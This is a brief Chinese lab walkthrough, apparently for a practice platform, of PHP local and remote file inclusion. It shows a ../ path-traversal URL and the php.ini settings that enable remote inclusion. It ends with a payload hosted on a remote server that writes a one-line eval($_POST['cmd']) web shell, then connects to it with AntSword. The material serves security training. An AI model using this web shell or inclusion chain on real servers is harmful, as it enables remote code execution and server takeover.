File inclusion(local)
创建1.php
随便选择一个提交
#
漏洞解析
$_GET
[
'filename'
]
接收客户端传的参数,其中没有任何过滤 带⼊到
include
函数中,
inclu
de
包含这个⽂件,引⼊到当前⽂件中,因此会造成⽂件包含漏洞;
#
⽂件包含
fi_local.php?filename=../../../../../../info.txt&submit=
提交查询
#
注解
../
是上⼀级路径,如果存在漏洞⽂件⼜存在的时候,不是 php ⽂件会被读取显示在⻚⾯中;
File Inclusion(remote)(远程文件包含)
php.ini参数设置
在 php.ini ⾥有两个重要的参数
allow_url_fopen
、allow_url_include
;
allow_url_fopen
:默认值是 ON。允许 url ⾥的封装协议访问⽂件;
allow_url_include
:默认值是 OFF。不允许包含 url ⾥的封装协议包含⽂件;
全部改成on
随便选一个球员提交
宝塔公网上创建一个6.txt文件,里面输入
<?php fputs(fopen("lsz.php","w"),'<?php eval($_POST["cmd"]);?>')?>
fileinclude目录下找到php文件
访问php文件,蚁剑连接